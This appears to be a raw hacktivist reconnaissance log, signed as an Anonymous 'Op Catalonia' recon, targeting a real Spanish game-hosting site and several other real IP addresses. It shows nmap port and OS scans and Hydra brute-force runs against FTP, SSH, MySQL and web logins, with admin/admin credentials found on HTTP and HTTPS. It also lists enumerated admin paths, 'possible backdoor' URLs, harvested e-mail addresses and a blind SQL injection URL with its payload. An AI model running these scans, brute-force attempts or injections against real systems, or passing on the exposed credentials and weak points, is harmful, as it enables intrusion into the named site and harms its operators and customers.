1233. Aggressive OS guesses: OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (96%), OpenWrt White Russian 0.9 (Linux 2.4.30) (96%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), Linux 3.0 (93%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (93%), Linux 2.4.18 (93%), Asus RT-AC66U router (Linux 2.6) (92%), Asus RT-N16 WAP (Linux 2.6) (92%), Asus RT-N66U WAP (Linux 2.6) (92%), Tomato 1.28 (Linux 2.6.22) (92%)
1234. No exact OS matches for host (test conditions non-ideal).
1235. Network Distance: 2 hops
1236. TCP Sequence Prediction: Difficulty=262 (Good luck!)
1237. IP ID Sequence Generation: All zeros
1238. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
1239.  
1240. TRACEROUTE (using port 445/tcp)
1241. HOP RTT ADDRESS
1242. 1 126.44 ms 10.248.200.1
1243. 2 126.43 ms 5.135.156.30
1244.  
1245. NSE: Script Post-scanning.
1246. Initiating NSE at 12:57
1247. Completed NSE at 12:57, 0.00s elapsed
1248. Initiating NSE at 12:57
1249. Completed NSE at 12:57, 0.00s elapsed
1250. Read data files from: /usr/bin/../share/nmap
1251. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1252. Nmap done: 1 IP address (1 host up) scanned in 80.43 seconds
1253. Raw packets sent: 1399 (65.946KB) | Rcvd: 3281 (652.639KB)
1254. #######################################################################################################################################
1255. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:57 EST
1256. NSE: Loaded 148 scripts for scanning.
1257. NSE: Script Pre-scanning.
1258. Initiating NSE at 12:57
1259. Completed NSE at 12:57, 0.00s elapsed
1260. Initiating NSE at 12:57
1261. Completed NSE at 12:57, 0.00s elapsed
1262. Initiating Parallel DNS resolution of 1 host. at 12:57
1263. Completed Parallel DNS resolution of 1 host. at 12:57, 16.51s elapsed
1264. Initiating UDP Scan at 12:57
1265. Scanning 5.135.156.30 [14 ports]
1266. Discovered open port 53/udp on 5.135.156.30
1267. Completed UDP Scan at 12:57, 1.91s elapsed (14 total ports)
1268. Initiating Service scan at 12:57
1269. Scanning 11 services on 5.135.156.30
1270. Service scan Timing: About 18.18% done; ETC: 13:06 (0:07:17 remaining)
1271. Completed Service scan at 12:59, 102.57s elapsed (11 services on 1 host)
1272. Initiating OS detection (try #1) against 5.135.156.30
1273. Retrying OS detection (try #2) against 5.135.156.30
1274. Initiating Traceroute at 12:59
1275. Completed Traceroute at 12:59, 7.20s elapsed
1276. Initiating Parallel DNS resolution of 1 host. at 12:59
1277. Completed Parallel DNS resolution of 1 host. at 12:59, 16.50s elapsed
1278. NSE: Script scanning 5.135.156.30.
1279. Initiating NSE at 12:59
1280. Completed NSE at 13:00, 20.25s elapsed
1281. Initiating NSE at 13:00
1282. Completed NSE at 13:00, 1.02s elapsed
1283. Nmap scan report for 5.135.156.30
1284. Host is up (0.13s latency).
1285.  
1286. PORT STATE SERVICE VERSION
1287. 53/udp open domain ISC BIND 9.8.1-P1
1288. | dns-nsid:
1289. |_ bind.version: 9.8.1-P1
1290. 67/udp open|filtered dhcps
1291. 68/udp open|filtered dhcpc
1292. 69/udp open|filtered tftp
1293. 88/udp open|filtered kerberos-sec
1294. 123/udp open|filtered ntp
1295. 137/udp filtered netbios-ns
1296. 138/udp filtered netbios-dgm
1297. 139/udp open|filtered netbios-ssn
1298. 161/udp open|filtered snmp
1299. 162/udp open|filtered snmptrap
1300. 389/udp open|filtered ldap
1301. 520/udp open|filtered route
1302. 2049/udp closed nfs
1303. Too many fingerprints match this host to give specific OS details
1304. Network Distance: 7 hops
1305.  
1306. TRACEROUTE (using port 138/udp)
1307. HOP RTT ADDRESS
1308. 1 123.43 ms 10.248.200.1
1309. 2 124.11 ms 10.248.200.1
1310. 3 124.11 ms 10.248.200.1
1311. 4 124.11 ms 10.248.200.1
1312. 5 124.10 ms 10.248.200.1
1313. 6 124.10 ms 10.248.200.1
1314. 7 124.12 ms 10.248.200.1
1315. 8 ... 9
1316. 10 127.35 ms 10.248.200.1
1317. 11 ... 18
1318. 19 123.87 ms 10.248.200.1
1319. 20 128.32 ms 10.248.200.1
1320. 21 ... 28
1321. 29 123.32 ms 10.248.200.1
1322. 30 124.89 ms 10.248.200.1
1323.  
1324. NSE: Script Post-scanning.
1325. Initiating NSE at 13:00
1326. Completed NSE at 13:00, 0.00s elapsed
1327. Initiating NSE at 13:00
1328. Completed NSE at 13:00, 0.00s elapsed
1329. Read data files from: /usr/bin/../share/nmap
1330. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1331. Nmap done: 1 IP address (1 host up) scanned in 169.61 seconds
1332. Raw packets sent: 127 (5.932KB) | Rcvd: 1393 (167.069KB)
1333. ################################### Running Port Scan #################################################################################
1334. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 13:00 EST
1335. Nmap scan report for 5.135.156.30
1336. Host is up (0.14s latency).
1337. Not shown: 15 filtered ports, 6 closed ports
1338. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1339. PORT STATE SERVICE
1340. 21/tcp open ftp
1341. 22/tcp open ssh
1342. 80/tcp open http
1343. 443/tcp open https
1344. 3306/tcp open mysql
1345.  
1346. Nmap done: 1 IP address (1 host up) scanned in 18.29 seconds
1347.  
1348. ################################### Running Brute Force ###############################################################################
1349.  
1350. + -- --=[Port 21 opened... running tests...
1351. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1352.  
1353. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:00:31
1354. [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
1355. [DATA] attacking ftp://5.135.156.30:21/
1356. [STATUS] 33.00 tries/min, 33 tries in 00:01h, 192 to do in 00:06h, 1 active
1357. [STATUS] 33.33 tries/min, 100 tries in 00:03h, 125 to do in 00:04h, 1 active
1358. [STATUS] 35.00 tries/min, 140 tries in 00:04h, 85 to do in 00:03h, 1 active
1359. [STATUS] 40.20 tries/min, 201 tries in 00:05h, 24 to do in 00:01h, 1 active
1360. 1 of 1 target completed, 0 valid passwords found
1361. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:05:50
1362. + -- --=[Port 22 opened... running tests...
1363. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1364.  
1365. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:05:50
1366. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
1367. [DATA] attacking ssh://5.135.156.30:22/
1368. [STATUS] 26.00 tries/min, 26 tries in 00:01h, 340 to do in 00:14h, 1 active
1369. [STATUS] 51.00 tries/min, 153 tries in 00:03h, 213 to do in 00:05h, 1 active
1370. 1 of 1 target completed, 0 valid passwords found
1371. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:17
1372. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1373.  
1374. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:17
1375. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1376. [DATA] attacking ssh://5.135.156.30:22/
1377. + -- --=[Port 23 closed... skipping.
1378. + -- --=[Port 25 closed... skipping.
1379. + -- --=[Port 80 opened... running tests...
1380. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1381.  
1382. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:17
1383. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1384. [DATA] attacking http-get://5.135.156.30:80//
1385. [80][http-get] host: 5.135.156.30 login: admin password: admin
1386. [STATUS] attack finished for 5.135.156.30 (valid pair found)
1387. 1 of 1 target successfully completed, 1 valid password found
1388. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:19
1389. + -- --=[Port 110 closed... skipping.
1390. + -- --=[Port 139 closed... skipping.
1391. + -- --=[Port 162 closed... skipping.
1392. + -- --=[Port 389 closed... skipping.
1393. + -- --=[Port 443 opened... running tests...
1394. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1395.  
1396. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:19
1397. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1398. [DATA] attacking http-gets://5.135.156.30:443//
1399. [443][http-get] host: 5.135.156.30 login: admin password: admin
1400. [STATUS] attack finished for 5.135.156.30 (valid pair found)
1401. 1 of 1 target successfully completed, 1 valid password found
1402. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:23
1403. + -- --=[Port 445 closed... skipping.
1404. + -- --=[Port 512 closed... skipping.
1405. + -- --=[Port 513 closed... skipping.
1406. + -- --=[Port 514 closed... skipping.
1407. + -- --=[Port 993 closed... skipping.
1408. + -- --=[Port 1433 closed... skipping.
1409. + -- --=[Port 1521 closed... skipping.
1410. + -- --=[Port 3306 opened... running tests...
1411. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1412.  
1413. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:23
1414. [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
1415. [DATA] attacking mysql://5.135.156.30:3306/
1416. 1 of 1 target completed, 0 valid passwords found
1417. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:12:04
1418. + -- --=[Port 3389 closed... skipping.
1419. + -- --=[Port 5432 closed... skipping.
1420. + -- --=[Port 5900 closed... skipping.
1421. + -- --=[Port 5901 closed... skipping.
1422. + -- --=[Port 8000 closed... skipping.
1423. + -- --=[Port 8080 closed... skipping.
1424. + -- --=[Port 8100 closed... skipping.
1425. + -- --=[Port 6667 closed... skipping.
1426.  
1427. ################################### Done! #############################################################################################
1428.  
1429.  
1430. * default
1431. * default
1432. [*] Importing 'Nmap XML' data
1433. [*] Import: Parsing with 'Nokogiri v1.8.5'
1434. [*] Importing host 5.135.156.30
1435. [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-udp-5.135.156.30.xml
1436. [*] Importing 'Nmap XML' data
1437. [*] Import: Parsing with 'Nokogiri v1.8.5'
1438. [*] Importing host 5.135.156.30
1439. [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-5.135.156.30-udp.xml
1440. [*] Importing 'Nmap XML' data
1441. [*] Import: Parsing with 'Nokogiri v1.8.5'
1442. [*] Importing host 5.135.156.30
1443. [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-5.135.156.30.xml
1444.  
1445. Hosts
1446. =====
1447.  
1448. address mac name os_name os_flavor os_sp purpose info comments
1449. ------- --- ---- ------- --------- ----- ------- ---- --------
1450. 5.135.156.30 Linux 2.4.X server
1451. 86.51.174.170 Linux 3.X server
1452. 91.121.2.184 Linux 2.6.X server
1453. 104.196.67.80 Linux 3.X server
1454. 195.55.47.89 Windows 3.X device
1455.  
1456. Services
1457. ========
1458.  
1459. host port proto name state info
1460. ---- ---- ----- ---- ----- ----
1461. 5.135.156.30 21 tcp ftp open ProFTPD or KnFTPD
1462. 5.135.156.30 22 tcp ssh open OpenSSH 5.9p1 Debian 5ubuntu1.4 Ubuntu Linux; protocol 2.0
1463. 5.135.156.30 53 udp domain open ISC BIND 9.8.1-P1
1464. 5.135.156.30 67 udp dhcps unknown
1465. 5.135.156.30 68 udp dhcpc unknown
1466. 5.135.156.30 69 udp tftp unknown
1467. 5.135.156.30 80 tcp http open nginx
1468. 5.135.156.30 88 udp kerberos-sec unknown
1469. 5.135.156.30 123 udp ntp unknown
1470. 5.135.156.30 137 udp netbios-ns filtered
1471. 5.135.156.30 138 udp netbios-dgm filtered
1472. 5.135.156.30 139 udp netbios-ssn unknown
1473. 5.135.156.30 161 udp snmp unknown
1474. 5.135.156.30 162 udp snmptrap unknown
1475. 5.135.156.30 389 udp ldap unknown
1476. 5.135.156.30 443 tcp ssl/http open nginx
1477. 5.135.156.30 520 udp route unknown
1478. 5.135.156.30 2049 udp nfs closed
1479. 5.135.156.30 3306 tcp mysql open MySQL blocked - too many connection errors
1480. 86.51.174.170 25 tcp smtp closed
1481. 86.51.174.170 53 udp domain unknown
1482. 86.51.174.170 67 udp dhcps unknown
1483. 86.51.174.170 68 udp dhcpc unknown
1484. 86.51.174.170 69 udp tftp unknown
1485. 86.51.174.170 80 tcp http-proxy open Squid http proxy
1486. 86.51.174.170 88 udp kerberos-sec unknown
1487. 86.51.174.170 123 udp ntp unknown
1488. 86.51.174.170 137 udp netbios-ns filtered
1489. 86.51.174.170 138 udp netbios-dgm filtered
1490. 86.51.174.170 139 tcp netbios-ssn closed
1491. 86.51.174.170 139 udp netbios-ssn unknown
1492. 86.51.174.170 161 udp snmp unknown
1493. 86.51.174.170 162 udp snmptrap unknown
1494. 86.51.174.170 389 udp ldap unknown
1495. 86.51.174.170 443 tcp ssl/http open Microsoft IIS httpd 8.5
1496. 86.51.174.170 445 tcp microsoft-ds closed
1497. 86.51.174.170 520 udp route unknown
1498. 86.51.174.170 2049 udp nfs unknown
1499. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
1500. 91.121.2.184 25 tcp smtp closed
1501. 91.121.2.184 53 udp domain unknown
1502. 91.121.2.184 67 udp dhcps unknown
1503. 91.121.2.184 68 udp dhcpc unknown
1504. 91.121.2.184 69 udp tftp unknown
1505. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
1506. 91.121.2.184 88 udp kerberos-sec unknown
1507. 91.121.2.184 123 udp ntp unknown
1508. 91.121.2.184 137 udp netbios-ns filtered
1509. 91.121.2.184 138 udp netbios-dgm filtered
1510. 91.121.2.184 139 tcp netbios-ssn closed
1511. 91.121.2.184 139 udp netbios-ssn unknown
1512. 91.121.2.184 161 udp snmp unknown
1513. 91.121.2.184 162 udp snmptrap unknown
1514. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
1515. 91.121.2.184 389 udp ldap unknown
1516. 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
1517. 91.121.2.184 445 tcp microsoft-ds closed
1518. 91.121.2.184 465 tcp ssl/smtps open
1519. 91.121.2.184 520 udp route unknown
1520. 91.121.2.184 993 tcp ssl/imaps open
1521. 91.121.2.184 2049 udp nfs unknown
1522. 91.121.2.184 7071 tcp ssl/iwg1 open
1523. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
1524. 104.196.67.80 25 tcp smtp closed
1525. 104.196.67.80 53 udp domain unknown
1526. 104.196.67.80 67 udp dhcps unknown
1527. 104.196.67.80 68 udp dhcpc unknown
1528. 104.196.67.80 69 udp tftp unknown
1529. 104.196.67.80 80 tcp http-proxy open Squid http proxy
1530. 104.196.67.80 88 udp kerberos-sec unknown
1531. 104.196.67.80 123 udp ntp unknown
1532. 104.196.67.80 137 udp netbios-ns filtered
1533. 104.196.67.80 138 udp netbios-dgm filtered
1534. 104.196.67.80 139 tcp netbios-ssn closed
1535. 104.196.67.80 139 udp netbios-ssn unknown
1536. 104.196.67.80 161 udp snmp unknown
1537. 104.196.67.80 162 udp snmptrap unknown
1538. 104.196.67.80 389 udp ldap unknown
1539. 104.196.67.80 443 tcp ssl/http open nginx
1540. 104.196.67.80 445 tcp microsoft-ds closed
1541. 104.196.67.80 520 udp route unknown
1542. 104.196.67.80 2049 udp nfs unknown
1543. 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
1544. 195.55.47.89 25 tcp smtp closed
1545. 195.55.47.89 53 udp domain unknown
1546. 195.55.47.89 67 udp dhcps unknown
1547. 195.55.47.89 68 udp dhcpc unknown
1548. 195.55.47.89 69 udp tftp unknown
1549. 195.55.47.89 80 tcp http-proxy open Squid http proxy
1550. 195.55.47.89 88 udp kerberos-sec unknown
1551. 195.55.47.89 113 tcp ident closed
1552. 195.55.47.89 123 udp ntp unknown
1553. 195.55.47.89 137 udp netbios-ns filtered
1554. 195.55.47.89 138 udp netbios-dgm filtered
1555. 195.55.47.89 139 tcp netbios-ssn closed
1556. 195.55.47.89 139 udp netbios-ssn unknown
1557. 195.55.47.89 161 udp snmp unknown
1558. 195.55.47.89 162 udp snmptrap unknown
1559. 195.55.47.89 389 udp ldap unknown
1560. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
1561. 195.55.47.89 445 tcp microsoft-ds closed
1562. 195.55.47.89 520 udp route unknown
1563. 195.55.47.89 2049 udp nfs unknown
1564. #######################################################################################################################################
1565. =======================================================================================================================================
1566. | Domain: http://gamehosting.es/
1567. | IP: 5.135.156.30
1568. =======================================================================================================================================
1569. |
1570. | Directory check:
1571. | [+] CODE: 200 URL: http://gamehosting.es/adclick/
1572. | [+] CODE: 200 URL: http://gamehosting.es/adsales/
1573. | [+] CODE: 200 URL: http://gamehosting.es/adsense/
1574. | [+] CODE: 200 URL: http://gamehosting.es/adserver/
1575. | [+] CODE: 200 URL: http://gamehosting.es/adserv/
1576. | [+] CODE: 200 URL: http://gamehosting.es/adserve/
1577. | [+] CODE: 200 URL: http://gamehosting.es/adsrv/
1578. | [+] CODE: 200 URL: http://gamehosting.es/agmp/
1579. | [+] CODE: 200 URL: http://gamehosting.es/adbanner/
1580. | [+] CODE: 200 URL: http://gamehosting.es/advert/
1581. | [+] CODE: 200 URL: http://gamehosting.es/bannerad/
1582. | [+] CODE: 200 URL: http://gamehosting.es/gamex/
1583. | [+] CODE: 200 URL: http://gamehosting.es/game/
1584. | [+] CODE: 200 URL: http://gamehosting.es/phpads/
1585. | [+] CODE: 200 URL: http://gamehosting.es/phpmyadmin/
1586. | [+] CODE: 200 URL: http://gamehosting.es/publicidad/
1587. | [+] CODE: 200 URL: http://gamehosting.es/publicidade/
1588. | [+] CODE: 200 URL: http://gamehosting.es/site/
1589. | [+] CODE: 200 URL: http://gamehosting.es/siteads/
1590. | [+] CODE: 200 URL: http://gamehosting.es/textads/
1591. | [+] CODE: 200 URL: http://gamehosting.es/venta/
1592. | [+] CODE: 200 URL: http://gamehosting.es/webmail/
1593. ######################################################################################################################################
1594. | File check:
1595. | [+] CODE: 200 URL: http://gamehosting.es/admentor/adminadmin.asp
1596. | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/clickcount.pl?view=test
1597. | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterbanner-ord
1598. | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterbanner
1599. | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterfiglet-ord
1600. | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counter-ord
1601. | [+] CODE: 200 URL: http://gamehosting.es/index.html
1602. | [+] CODE: 200 URL: http://gamehosting.es/robots.txt
1603. | [+] CODE: 200 URL: http://gamehosting.es/sitemap.xml
1604. | [+] CODE: 200 URL: http://gamehosting.es/scripts/fpcount.exe
1605. | [+] CODE: 200 URL: http://gamehosting.es/_vti_bin/fpcount.exe
1606. =======================================================================================================================================
1607. |
1608. | Check robots.txt:
1609. |
1610. | Check sitemap.xml:
1611. | [+] http://gamehosting.es/Ddos.php
1612. | [+] http://gamehosting.es/about.html
1613. | [+] http://gamehosting.es/agmp/
1614. | [+] http://gamehosting.es/contact.html
1615. | [+] http://gamehosting.es/game-server-free.html
1616. | [+] http://gamehosting.es/game-server.html
1617. | [+] http://gamehosting.es/game/
1618. | [+] http://gamehosting.es/game/index.php?l=de
1619. | [+] http://gamehosting.es/game/index.php?l=dk
1620. | [+] http://gamehosting.es/game/index.php?l=es
1621. | [+] http://gamehosting.es/game/index.php?l=it
1622. | [+] http://gamehosting.es/game/index.php?l=uk
1623. | [+] http://gamehosting.es/game/index.php?s=about&#38;l=de
1624. | [+] http://gamehosting.es/game/index.php?s=about&#38;l=dk
1625. | [+] http://gamehosting.es/game/index.php?s=about&#38;l=es
1626. | [+] http://gamehosting.es/game/index.php?s=about&#38;l=it
1627. | [+] http://gamehosting.es/game/index.php?s=about&#38;l=uk
1628. | [+] http://gamehosting.es/game/index.php?s=contact&#38;l=de
1629. | [+] http://gamehosting.es/game/index.php?s=contact&#38;l=dk
1630. | [+] http://gamehosting.es/game/index.php?s=contact&#38;l=es
1631. | [+] http://gamehosting.es/game/index.php?s=contact&#38;l=it
1632. | [+] http://gamehosting.es/game/index.php?s=contact&#38;l=uk
1633. | [+] http://gamehosting.es/game/index.php?s=downloads&#38;l=de
1634. | [+] http://gamehosting.es/game/index.php?s=downloads&#38;l=dk
1635. | [+] http://gamehosting.es/game/index.php?s=downloads&#38;l=es
1636. | [+] http://gamehosting.es/game/index.php?s=downloads&#38;l=it
1637. | [+] http://gamehosting.es/game/index.php?s=downloads&#38;l=uk
1638. | [+] http://gamehosting.es/game/index.php?s=gallery&#38;l=de
1639. | [+] http://gamehosting.es/game/index.php?s=gallery&#38;l=dk
1640. | [+] http://gamehosting.es/game/index.php?s=gallery&#38;l=es
1641. | [+] http://gamehosting.es/game/index.php?s=gallery&#38;l=it
1642. | [+] http://gamehosting.es/game/index.php?s=gallery&#38;l=uk
1643. | [+] http://gamehosting.es/game/index.php?s=home&#38;l=de
1644. | [+] http://gamehosting.es/game/index.php?s=home&#38;l=dk
1645. | [+] http://gamehosting.es/game/index.php?s=home&#38;l=es
1646. | [+] http://gamehosting.es/game/index.php?s=home&#38;l=it
1647. | [+] http://gamehosting.es/game/index.php?s=home&#38;l=uk
1648. | [+] http://gamehosting.es/game/index.php?s=imprint&#38;l=de
1649. | [+] http://gamehosting.es/game/index.php?s=imprint&#38;l=dk
1650. | [+] http://gamehosting.es/game/index.php?s=imprint&#38;l=es
1651. | [+] http://gamehosting.es/game/index.php?s=imprint&#38;l=it
1652. | [+] http://gamehosting.es/game/index.php?s=imprint&#38;l=uk
1653. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=2&#38;l=es
1654. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=2&#38;l=it
1655. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=2&#38;l=uk
1656. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=3&#38;l=es
1657. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=3&#38;l=it
1658. | [+] http://gamehosting.es/game/index.php?s=news&#38;id=3&#38;l=uk
1659. | [+] http://gamehosting.es/game/index.php?s=news&#38;l=de
1660. | [+] http://gamehosting.es/game/index.php?s=news&#38;l=dk
1661. | [+] http://gamehosting.es/game/index.php?s=news&#38;l=es
1662. | [+] http://gamehosting.es/game/index.php?s=news&#38;l=it
1663. | [+] http://gamehosting.es/game/index.php?s=news&#38;l=uk
1664. | [+] http://gamehosting.es/game/index.php?s=protectioncheck&#38;l=de
1665. | [+] http://gamehosting.es/game/index.php?s=protectioncheck&#38;l=dk
1666. | [+] http://gamehosting.es/game/index.php?s=protectioncheck&#38;l=es
1667. | [+] http://gamehosting.es/game/index.php?s=protectioncheck&#38;l=it
1668. | [+] http://gamehosting.es/game/index.php?s=protectioncheck&#38;l=uk
1669. | [+] http://gamehosting.es/game/index.php?s=search&#38;l=de
1670. | [+] http://gamehosting.es/game/index.php?s=search&#38;l=dk
1671. | [+] http://gamehosting.es/game/index.php?s=search&#38;l=es
1672. | [+] http://gamehosting.es/game/index.php?s=search&#38;l=it
1673. | [+] http://gamehosting.es/game/index.php?s=search&#38;l=uk
1674. | [+] http://gamehosting.es/game/index.php?s=sitemap&#38;l=de
1675. | [+] http://gamehosting.es/game/index.php?s=sitemap&#38;l=dk
1676. | [+] http://gamehosting.es/game/index.php?s=sitemap&#38;l=es
1677. | [+] http://gamehosting.es/game/index.php?s=sitemap&#38;l=it
1678. | [+] http://gamehosting.es/game/index.php?s=sitemap&#38;l=uk
1679. | [+] http://gamehosting.es/game/index.php?site=about
1680. | [+] http://gamehosting.es/game/index.php?site=contact
1681. | [+] http://gamehosting.es/game/index.php?site=downloads
1682. | [+] http://gamehosting.es/game/index.php?site=gallery
1683. | [+] http://gamehosting.es/game/index.php?site=imprint
1684. | [+] http://gamehosting.es/game/index.php?site=lendserver
1685. | [+] http://gamehosting.es/game/index.php?site=lendserver&#38;d=gs
1686. | [+] http://gamehosting.es/game/index.php?site=lendserver&#38;d=vo
1687. | [+] http://gamehosting.es/game/index.php?site=news
1688. | [+] http://gamehosting.es/game/index.php?site=news&#38;id=2
1689. | [+] http://gamehosting.es/game/index.php?site=news&#38;id=3
1690. | [+] http://gamehosting.es/game/index.php?site=protectioncheck
1691. | [+] http://gamehosting.es/game/index.php?site=register
1692. | [+] http://gamehosting.es/game/index.php?site=search
1693. | [+] http://gamehosting.es/game/index.php?site=sitemap
1694. | [+] http://gamehosting.es/game/login.php
1695. | [+] http://gamehosting.es/game/login.php?w=pr
1696. | [+] http://gamehosting.es/google343aebe6ed7c7685.html
1697. | [+] http://gamehosting.es/index.html
1698. | [+] http://gamehosting.es/venta/cart.php
1699. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=1
1700. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=11
1701. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=12
1702. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=15
1703. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=2
1704. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=20
1705. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=3
1706. | [+] http://gamehosting.es/venta/cart.php?a=add&#38;pid=42&#38;carttpl=cart
1707. | [+] http://gamehosting.es/venta/cart.php?a=view
1708. | [+] http://gamehosting.es/venta/cart.php?gid=2
1709. | [+] http://gamehosting.es/venta/cart.php?gid=4a=add&#38;pid=8
1710. | [+] http://gamehosting.es/venta/cart.php?gid=6
1711. | [+] http://gamehosting.es/venta/cart.php?gid=7
1712. | [+] http://gamehosting.es/venta/clientarea.php
1713. | [+] http://gamehosting.es/venta/cloudhosting.php
1714. | [+] http://gamehosting.es/venta/contact.php
1715. | [+] http://gamehosting.es/venta/game.php
1716. | [+] http://gamehosting.es/venta/gamepanel.php
1717. | [+] http://gamehosting.es/venta/index.php
1718. | [+] http://gamehosting.es/venta/knowledgebase.php
1719. | [+] http://gamehosting.es/venta/lendserver.php
1720. | [+] http://gamehosting.es/venta/privacy.php
1721. | [+] http://gamehosting.es/venta/submitticket.php
1722. | [+] http://gamehosting.es/venta/terms.php
1723. | [+] http://gamehosting.es/venta/voz.php
1724. | [+] http://gamehosting.es/voice-server.html
1725. | [+] http://gamehosting.es/webmail/
1726. =======================================================================================================================================
1727. #######################################################################################################################################
1728. | External hosts:
1729. | [+] External Host Found: http://www.ozerov.de
1730. | [+] External Host Found: https://l10n.cihar.com
1731. | [+] External Host Found: http://www.gnu.org
1732. | [+] External Host Found: http://www.phpmyadmin.net
1733. | [+] External Host Found: http://bugs.mysql.com
1734. | [+] External Host Found: http://blobstreaming.org
1735. | [+] External Host Found: https://apis.google.com
1736. | [+] External Host Found: http://phpmyadmin.net
1737. | [+] External Host Found: http://www.hardened-php.net
1738. | [+] External Host Found: http://contador-de-visitas.com
1739. | [+] External Host Found: http://www.php.net
1740. | [+] External Host Found: http://phpmyadmin.git.sourceforge.net
1741. | [+] External Host Found: http://en.wikipedia.org
1742. | [+] External Host Found: http://pecl.php.net
1743. | [+] External Host Found: http://cdn2.editmysite.com
1744. | [+] External Host Found: http://sf.net
1745. | [+] External Host Found: https://ajax.googleapis.com
1746. | [+] External Host Found: http://cdn1.editmysite.com
1747. | [+] External Host Found: http://www.ietf.org
1748. | [+] External Host Found: http://www.tcpdf.org
1749. | [+] External Host Found: https://sourceforge.net
1750. | [+] External Host Found: http://www.acko.net
1751. | [+] External Host Found: http://bugzilla.mozilla.org
1752. | [+] External Host Found: http://www.fpdf.org
1753. | [+] External Host Found: http://pear.php.net
1754. | [+] External Host Found: http://php.net
1755. | [+] External Host Found: http://developers.slashdot.org
1756. | [+] External Host Found: https://lists.sourceforge.net
1757. | [+] External Host Found: http://l10n.cihar.com
1758. | [+] External Host Found: http://httpd.apache.org
1759. | [+] External Host Found: https://html5shim.googlecode.com
1760. | [+] External Host Found: http://bugs.php.net
1761. | [+] External Host Found: http://wiki.phpmyadmin.net
1762. | [+] External Host Found: http://dd.cron.ru
1763. | [+] External Host Found: http://www.wikipedia.org
1764. | [+] External Host Found: http://www.
1765. | [+] External Host Found: http://dev.mysql.com
1766. #######################################################################################################################################
1767. | Web Backdoors:
1768. | [+] Possible Backdoor: http://gamehosting.es/venta/terms.php
1769. | [+] Possible Backdoor: http://gamehosting.es/game/index.php?site=imprint
1770. ======================================================================================================================================
1771. | E-mails:
1772. | [+] E-mail Found: michal@cihar.com
1773. | [+] E-mail Found: info@gamehosting.es
1774. ######################################################################################################################################
1775. |
1776. | Blind SQL Injection:
1777. | [+] Vul [Blind SQL-i]: http://gamehosting.es/venta/serverstatus.php?view=scheduled+AND+1=1
1778. | [+] Keyword: Programado
1779. =======================================================================================================================================
1780. ######################################################################################################################################
1781. Anonymous JTSEC #Op Catalonia Full Recon #1